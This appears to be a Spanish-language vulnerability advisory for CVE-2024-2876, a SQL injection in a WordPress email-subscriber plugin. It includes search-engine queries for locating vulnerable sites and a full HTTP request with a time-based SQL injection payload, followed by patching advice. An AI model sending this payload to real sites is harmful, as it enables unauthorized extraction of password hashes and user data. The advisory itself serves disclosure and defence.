
Prueba de concepto de exploit para CVE-2024-2876, una inyección SQL crítica en el plugin de WordPress Email Subscribers by Icegram Express, que permite a atacantes no autenticados ejecutar consultas SQL arbitrarias.
CVE-2024-2876 es una vulnerabilidad de seguridad crítica encontrada en el plugin "Email Subscribers by Icegram Express" para WordPress. Esta vulnerabilidad afecta a las versiones hasta la 5.7.14 inclusive y representa riesgos significativos para más de 90.000 sitios web.
La vulnerabilidad es un fallo de inyección SQL que permite a atacantes no autenticados ejecutar consultas SQL maliciosas en las bases de datos de WordPress afectadas. Al manipular las entradas de usuario que no están debidamente saneadas, los atacantes pueden extraer información sensible como nombres de usuario, direcciones de correo electrónico, hashes de contraseñas y listas de suscriptores.
La inyección SQL ocurre dentro de la función run de la clase del plugin, donde una validación de entrada inadecuada conduce a la ejecución no autorizada de código SQL. Esto compromete la integridad y confidencialidad de los datos almacenados en la base de datos de WordPress.
IG_ES_Subscribers_QueryFOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
Actualización Inmediata: Si está utilizando el plugin "Email Subscribers by Icegram Express", actualice a la versión 5.7.15 o posterior de inmediato para aplicar la corrección de seguridad.
Auditorías Regulares: Revise y actualice periódicamente todos los plugins y temas de WordPress a sus últimas versiones para garantizar la seguridad.
Plugins de Seguridad: Utilice plugins de seguridad de WordPress de confianza para reforzar las defensas contra la inyección SQL y otras amenazas cibernéticas.
Políticas de Contraseñas Fuertes: Implemente contraseñas fuertes y únicas para todas las cuentas relacionadas con su sitio de WordPress para reducir los riesgos de acceso no autorizado.
No actualizar el plugin afectado puede dejar los sitios web vulnerables a filtraciones de datos y accesos no autorizados. Dado el uso generalizado de este plugin, la acción inmediata es crucial para asegurar las instalaciones.